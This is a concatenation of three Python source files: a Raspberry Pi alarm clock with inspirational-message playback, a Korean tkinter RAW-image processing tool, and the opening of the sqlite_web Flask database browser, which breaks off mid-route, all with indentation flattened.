Author(s): Pekka Lehtikoski and Sofie Lehtikoski
Description: An expandable life-manager device, starting
with an alarm clock and inspirational message
selector. :)
'''
import time
import datetime
import RPi.GPIO as GPIO
import threading
from pygame import mixer
import math
import copy
import os
#import st7735s as controller
#import Python_ST7735.ST7735 as TFT
#import Adafruit_GPIO.SPI as SPI
#from st7735_tft.st7735_tft import ST7735_TFT
from st7735.library.ST7735 import ST7735 as ST7735_TFT
from PIL import Image
GPIO.setmode(GPIO.BOARD)
# HARDWARE COMPONENTS AND ABSTRACTION
class ButtonController(object):
'''
The base controller class for each of the buttons.
Allows support for interfacing with the display and
speaker.
'''
def __init__(self,):
pass
class InspirationalButton(ButtonController):
'''
Button that shuffles through inspirational
messages and outputs them to the speaker
'''
def __init__(self,speaker,channel):
self.speaker = speaker
# Start editing mode button
midChnl = channel
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.RISING)
GPIO.add_event_callback(midChnl, self.speaker.playInspirationMsg)
class SetAlarmButton(ButtonController):
'''
Button that sets the alarm time on the display and
internal program. Interfaces with the display and directly
feeds it instructions based on the editing button feedback.
'''
def __init__(self,display,channels):
# Initialize display
#channels format: {'MID':10,'UP':29,'DOWN':31,'LEFT':7,'RIGHT':15}
self.display = display
# SET UP GPIO PINs for the given button
#
# Start editing mode button
midChnl = channels['MID'] # SET button
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.startEditingMode)
# Direction buttons
midChnl = channels['UP']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.incrementDigit)
midChnl = channels['DOWN']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.decrementDigit)
midChnl = channels['LEFT']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.selectLeftDigit)
midChnl = channels['RIGHT']
GPIO.setup(midChnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(midChnl, GPIO.BOTH)
GPIO.add_event_callback(midChnl, self.display.selectRightDigit)
#if GPIO.input(10):
#GPIO.wait_for_edge(10, GPIO.RISING)
def getAlarmTime(self,):
# Gets the stored alarm time displayed
return self.display.getAlarmTime()
class OnOffSwitch(ButtonController):
'''
TOGGLE SWITCH that is able to turn the alarm on and off.
Does not need to interface with any other hardware,
only the base program internals.
'''
#isOn = True # TODO: Delete when GpIO is actually connected
def __init__(self,channel):
''' Sets the hardware switch based on the on/off '''
self.chnnl = channel
GPIO.setup(self.chnnl, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
def checkIsOn(self,):
'''
If hardware switch is ON (connects wires), then we should
return False (reversed logic so that when the switch is
entirely disconnected, it by default returns True)
'''
#print('GPIO input')
#print(GPIO.input(self.chnnl))
return not GPIO.input(self.chnnl)
class Speaker(object):
'''
A wrapper for the speaker hardware to allow basic controls
in Python. Includes controls for grabbing the audioclip to play.
Future dreams:
    - connect speaker via bluetooth instead of GPIO?
- connect speaker to webradio for a radio or music option
'''
basepath = "/coderoot/pins/tests/alarmclock/code"# '/'.join(__file__.split('/')[:-1]) # TODO: Hardcoded path
audiopath = basepath + '/audiofiles'
print(audiopath)
inspirational_msgs = [
# List of inspirational messages, as audio files to pull from
'./audiofiles/inspiration/'+filename for filename in os.listdir(audiopath+'/inspiration')
]
morning_msgs = [
# List of wake-up messages played at the alarm times (also audio files)
'./audiofiles/morning/'+filename for filename in os.listdir(audiopath+'/morning')
]
def __init__(self,channels):
''' Sets up the Speaker pi channel '''
# Raspberry Pi GPIO stuff
#self.leftChannel = channels["LEFT"] # Pins will be configured in
# operating system for auto-detection, not here
#GPIO.setup(self.leftChannel, GPIO.OUT, initial=GPIO.LOW)
# Sound play-back setup
mixer.init(buffer=2048) # NOTE: Small buffer size allocated to prevent memory/underrun issues with the pi 0
def messageShuffle(self, messageList):
'''
Selects a message from the messageList
at random and outputs it
'''
import random
ind = random.randint(0,len(messageList)-1)
return messageList[ind]
def playMorningAlarm(self,):
''' Plays a random morning alarm from the morning audio set '''
audiofile = self.messageShuffle(self.morning_msgs)
self.startSound(audiofile)
def playInspirationMsg(self,callback_channel):
''' Plays inspirational message from the inspirational audio set '''
audiofile = self.messageShuffle(self.inspirational_msgs)
self.startSound(audiofile)
def startSound(self,soundclip):
'''
Starts playing the soundclip (given as an audio file path)
TODO: Requires understanding of hardware mechanics. -> add
to GPIO board somehow rather than just playing it to Linux.
(We need our GPIO-connected speaker to somehow be
recognized as a sound output device by the Pi?)
'''
if not mixer.music.get_busy():
# Won't restart from beginning if it's already playing
# (prevent startSound to be called multiple times in the same second)
mixer.music.load(soundclip)
mixer.music.play()
#GPIO.output(self.leftChannel, GPIO.HIGH)
class Display(object):
'''
A wrapper for the display hardware to allow basic controls
in Python. Includes basic time-displaying functionalities.
Future dreams (TODO):
    - sleep progress bar (sleep tracking! If you are awake to see this, that's a problem!)
- display real time instead of alarm time? or next to? (one can be smaller than the other)
- be able to make 2D array keyboard controllable by set alarm button, in order to config the
wifi
'''
# Stored Time Globals
currentTime = [0,0,0,0] # The current time to display
alarmTime = [1,0,0,0] # The stored display/alarm time, in a readable
# format (should contain 4 int digits, in 24-hour time)
tempAlarmTime = [0,0,0,0] # Temporary storage for the alarmTime while editing
# (allows resetting)
# Display globals
digitToImg = { # Number to PIL Image file
1:None,2:None,3:None,4:None,5:None,6:None,7:None,8:None,9:None,0:None,'clear':None,'colon':None
}
screenWidth = 160
screenHeight = 128
# Editing Interface/Button Globals
    editModeInd = -1 # Blinky time-editing mode, index matches the digit that should
# be blinking (unless -1, in which case editing mode is off)
buttonDelay = 0.3 # The amount of time before another button press is allowed, to prevent multiple presses
buttonTime = 0.0 # A time tracker for the button
def __init__(self,channels):
'''
Initiates the display hardware and begins rendering
on the display (in a separate thread).
'''
# Pins
#BCMconversions = {22:25,36:16,16:23}
self.screen = ST7735_TFT(
port = 0,
cs = 0,
dc = channels['DC'],
backlight = channels['BACKLIGHT'],
rst = channels['RST'],
            spi_speed_hz = 24000000,
width = self.screenHeight,#128, #160,
height= self.screenWidth,#160, #128
offset_left=0,
offset_top=0,
rotation=0
)
#self.nightLight = channels['NIGHTLIGHT'] # TODO: Comment out, LED is for testing only
#GPIO.setup(self.nightLight, GPIO.OUT, initial=GPIO.LOW)
#GPIO.output(self.nightLight, GPIO.HIGH) # FOR TESTING ONLY
#time.sleep(2)
#GPIO.output(self.nightLight, GPIO.LOW)
# Set all the digits appropriately given the files
for num in self.digitToImg.keys():
filepath = './digit_sheet/'+str(num)+'.png'
self.digitToImg[num] = Image.open(filepath)
# Start rendering the display
self.startRendering()
# EDITING MODE FUNCS (serve as callbacks to setAlarm button inputs)
def buttonWrapper(buttonFunc):
'''
Decorater func to deal with button timings and
prevent unintended double-clicking
'''
def wrapper(self,callback_channel):
if GPIO.input(callback_channel):
# Is rising
                if time.time() - self.buttonTime >= self.buttonDelay:
# Button is only called if past the falling-edge delay
# (prevents double-clicking)
buttonFunc(self,callback_channel)
self.buttonTime = 0.
else:
# Is falling, starts the button timer
self.buttonTime = time.time()
return wrapper
@buttonWrapper
def startEditingMode(self,callback_channel):
'''
Start the editing mode by blinking the first digit on and off.
Can also stop the editing mode instead if it stops.
'''
if self.editModeInd == -1:
# Editing mode was off, intialize it
self.editModeInd = 0
            self.tempAlarmTime = copy.deepcopy(self.alarmTime) # copy, so in-place digit edits do not also change the saved value
else:
# Editing mode was on, turn it off
self.editModeInd = -1
@buttonWrapper
def incrementDigit(self,callback_channel):
''' Increments a digit during the editing mode '''
if self.editModeInd != -1:
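            # Allowed ranges per digit: tens-of-hours 0-2, tens-of-minutes 0-5, the other digits 0-9.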
modNum = 3 if self.editModeInd==0 else \
10 if (self.editModeInd == 1 or self.editModeInd == 3) else 6
self.alarmTime[self.editModeInd] = (self.alarmTime[self.editModeInd] + 1) % modNum
@buttonWrapper
def decrementDigit(self,callback_channel):
''' Decrements a digit during the editing mode '''
if self.editModeInd != -1:
modNum = 3 if self.editModeInd==0 else \
10 if (self.editModeInd == 1 or self.editModeInd == 3) else 6
self.alarmTime[self.editModeInd] = (self.alarmTime[self.editModeInd] - 1) % modNum
@buttonWrapper
def selectLeftDigit(self,callback_channel):
''' Edits the digit to the left now instead '''
if self.editModeInd != -1:
self.editModeInd = (self.editModeInd - 1) % len(self.alarmTime)
@buttonWrapper
def selectRightDigit(self,callback_channel):
''' Edits digit to the right now instead '''
if self.editModeInd != -1:
self.editModeInd = (self.editModeInd + 1) % len(self.alarmTime)
@buttonWrapper
def resetEdits(self,callback_channel):
''' Resets the alarmTime to the value it was before any edits happened '''
self.alarmTime = self.tempAlarmTime
def isEditing(self,):
''' Returns true if editing mode is on '''
return self.editModeInd != -1
# GENERAL RENDERING AND FUNCS
def startRendering(self,):
'''
Starts rendering the display in a separate THREAD, using a
given refresh rate. Also creates a blinky effect on the
position self.editModeInd when editing mode is enabled.
'''
th = threading.Thread(target=self.renderingThread)
th.start()
def renderingThread(self,):
''' Start screen rendering application. '''
blinkDelay = .5 # .5 second blink delay
isOdd = False
while True:
if self.editModeInd != -1:
# Editing mode is enabled, render alarm time and
# make the current digit being edited digit blink by
# adding it on every second loop
alarmTime = copy.deepcopy(self.alarmTime)
if isOdd:
alarmTime[self.editModeInd] = 'clear'
isOdd = False
else:
isOdd = True
self.renderAlarmTime(alarmTime)
time.sleep(blinkDelay)
else:
# Normal mode, display current time instead
self.renderAlarmTime(self.currentTime)
time.sleep(1)
def getAlarmTime(self,):
return self.alarmTime
def updateCurrentTime(self,newCurrTime):
'''
Updates the current time with newCurrTime
'''
self.currentTime = newCurrTime
def updateAlarmTime(self,newAlarmTime):
'''
Updates the real display time (the alarm time that
is stored) according to the given input
'''
self.alarmTime = newAlarmTime
def createDigitBitmap(self,digit):
'''
Creates a digit bitmap for the given digit or character,
using the self.digitToImg dictionary
(Note: the only additional character you'd really need for
this is the colon, ":")
Inputs:
digit (int): the digit to render. if None, then the
created bitmap should be all dark/blank
Outputs:
dbitmap (list) : a PIL image object
'''
return self.digitToImg[digit]
def renderAlarmTime(self,alarmTime):
'''
Inputs:
alarmTime (list) : list of four int digits, to render
on-screen in the appropriate order
NOTE: if editMode==True, this should become blinky somehow
'''
# Convert the alarm time into a set of appropriate PIL image files
adjAlarmTime = alarmTime[:2] + ["colon"] + alarmTime[2:] # Adjusted alarm time to include the colon
imgList = [self.createDigitBitmap(d) for d in adjAlarmTime]
# Combines the imgList items in a
# nice and correctly sized format with margin
size = (self.screenWidth,self.screenHeight)
timeImg = Image.new('RGB',size,color='#FFFFFF')
vDist = int((size[1] - imgList[0].height) / 2)
hStart = int((size[0] - sum([img.width for img in imgList])) / 2)
timeImg.paste(imgList[0], (hStart, vDist))
hDist = imgList[0].width + hStart
for ind in range(1,len(imgList)):
# Concatenates the images horizontally
timeImg.paste(imgList[ind], (hDist, vDist))
hDist += imgList[ind].width
# Apply to the display screen.
timeImg = timeImg.transpose(Image.ROTATE_90) # rotate due to weird display weirdness
#timeImg.save('currTime.jpg') # for TESTING only
self.screen.display(timeImg)#draw(timeImg)
# OTHER ABSTRACTION CLASSES
class Time(object):
'''
A stored time object (as a list of 4 ints) in 24-hour time.
Contains helpful operations, like comparators.
TODO: pull in all time object data into here instead for
consistency and easy maintainability.
'''
pass
# BASE PYTHON CONTROLS
# (manages and coordinates all the above elements)
class AlarmClock(object):
'''
Class that coordinates and manages all
the hardware and life-manager features.
'''
# Globals
lastCheckedTime = [] # Last checked time object (list of four ints)
def __init__(self,speaker,display,inspbutton,setalarmbutton,onoffbutton):
'''
Initiates the AlarmClock class with the necessary hardware components.
speaker : The python wrapper object for the speaker (hardware)
display : The python wrapper object for the display (hardware)
inspbutton : The python wrapper for the "inspirational messages" button
setalarmbutton: "" for the "set alarm" button
onoffbutton : "" for the button that can turn the alarm on and off
'''
self.speaker = speaker
self.display = display
self.inspbutton = inspbutton
self.setalarmbutton = setalarmbutton
self.onoffbutton = onoffbutton
def main(self,):
''' Starts all the major alarm clock processes. '''
# Check time for alarm sounding
self.startTimeChecking()
def startTimeChecking(self,):
'''
Starts a time checking polling thread. Upon the system time being
determined to be true, starts the alarm sound by pulling a random
audio file from the morning_msgs.
'''
th = threading.Thread(target=self.timeCheckingWorker)
th.start()
def timeCheckingWorker(self,):
'''
Starts a time checking polling thread. Upon the system time being
determined to be true, starts the alarm sound by pulling a random
audio file from the morning_msgs.
'''
while True:
# Polling loop
isTime = self.checkTime()
isNotEditing = not self.display.isEditing()
if isTime and isNotEditing:
# Loop only does anything when we want the alarm to do something
if self.onoffbutton.checkIsOn():
# Actually starts the audio
self.speaker.playMorningAlarm()
# Waits five seconds before polling again
time.sleep(5)
def getCurrSystemTime(self,):
'''
Gets the current system time, expressed as a list of four
        integers (hours:minutes).
'''
currTime = datetime.datetime.now()
currHr = currTime.hour
currMin = currTime.minute
time = [math.floor(currHr/10),currHr % 10,math.floor(currMin/10),currMin % 10]
#print(time)
return time
def checkTime(self,):
'''
Checks if current system/online time matches the display timer. Returns
        True if it matches or if the alarmTime is before the current time
and after the self.lastCheckedTime.
OUTER CONTEXT: This function needs to be periodically called to function
appropriately.
TODO: Test transition from one 24-hour day to the next.
'''
def checkIfTimeIsLessThan(time,valueToCompareTo):
'''
Checks if the given time input is less than the
valueToCompareTo, given the [int,int,int,int] formatting
of time.
'''
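            # Digit-by-digit comparison, most-significant digit first, e.g. [0, 9, 3, 0] < [1, 0, 0, 0].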
for ind in range(len(time)):
if time[ind] < valueToCompareTo[ind]:
return True
if time[ind] > valueToCompareTo[ind]:
return False
return False
# Gets the current time and the alarm clock time
currSystemTime = self.getCurrSystemTime()
self.display.updateCurrentTime(currSystemTime) # update the display with the current time
alarmTime = self.setalarmbutton.getAlarmTime()
# Compares them and outputs message
isTime = (alarmTime == currSystemTime) or \
(checkIfTimeIsLessThan(alarmTime,currSystemTime)
and checkIfTimeIsLessThan(self.lastCheckedTime,alarmTime))
self.lastCheckedTime = currSystemTime
return isTime
if __name__ == '__main__':
# Initiate and run
speaker = Speaker({'LEFT':32,'RIGHT':33})
display = Display({'NIGHTLIGHT':37,'DC':22,'RST':36,'BACKLIGHT':16})
inspButton = InspirationalButton(speaker,12)
setAlarmButton = SetAlarmButton(display,{'MID':10,'UP':29,'DOWN':31,'LEFT':7,'RIGHT':15})
onOffButton = OnOffSwitch(35)
alarmClock = AlarmClock(speaker,display,inspButton,setAlarmButton,onOffButton)
alarmClock.main()
#display.updateAlarmTime([0,2,0,6]) # TESTING
#display.screen.close() # TODO: Figure out the code and put this in a better spot
|
analy_GUI_ver0.01.py
|
## Image processing and data analysis tool
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## Function definitions
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    fsize = os.path.getsize(fname) # check the file size
    inH = inW = int(math.sqrt(fsize)) # decide the input buffer size (important!)
inImage = []; tmpList = []
    for i in range(inH) : # allocate the input buffer (initialized to 0)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
    # Load the data from the file into memory
    fp = open(fname, 'rb') # open the file (binary mode)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    loadImage(filename) # file --> input buffer
    equal() # input buffer --> output buffer
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Remove the existing canvas, if any.
if canvas != None :
canvas.destroy()
    # Prepare the window (fixed size)
window.geometry(str(outH) + 'x' + str(outW))
canvas = Canvas(window, width=outW, height=outH)
paper = PhotoImage(width=outW, height=outH)
canvas.create_image((outW/2, outH/2), image=paper, state='normal')
    # Draw to the screen
def putPixel() :
for i in range(0, outH) :
for k in range(0, outW) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data), (k,i))
threading.Thread(target=putPixel).start()
canvas.pack()
def equal() : # identity (copy) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Important! decide the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
    for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
    # The actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # brighten algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Important! decide the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
    for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
    # The actual image-processing algorithm
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # mean pixel value of the input/output images
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
    subWindow = Toplevel(window) # sub-window owned by the parent window
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def upDown() : # vertical flip algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Important! decide the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
    for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
    # The actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
            outImage[outH-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # pan: record the drag start point
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # pan: apply the drag offset
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
    # Important! decide the output buffer size
outW = inW; outH = inH;
outImage = []; tmpList = []
    for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
    # The actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # shrink (zoom out) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Important! decide the output buffer size
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
    for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
    # The actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    for i in range(outH):
        for k in range(outW):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
## Globals
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
## Main code
window = Tk(); window.geometry('200x200');
window.title('영상 처리&데이터 분석 Ver 0.3')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
window.mainloop()
|
sqlite_web.py
|
#!/usr/bin/env python
import operator
import datetime
import math
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
# Py3k compat.
if sys.version_info[0] == 3:
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
else:
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
                           'Please update by running pip install --upgrade '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import OperationalError
from playhouse.dataset import DataSet, Table
from playhouse.migrate import migrate
from sqlite_web.utils import get_fields_for_columns
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
template_folder=os.path.join(CUR_DIR, 'templates'),
static_folder=os.path.join(CUR_DIR, 'static'),
)
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
return os.path.realpath(dataset._database.database)
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
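        # FTS virtual tables create backing shadow tables named <table>_<suffix>; collect those names here.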
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or '/')
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
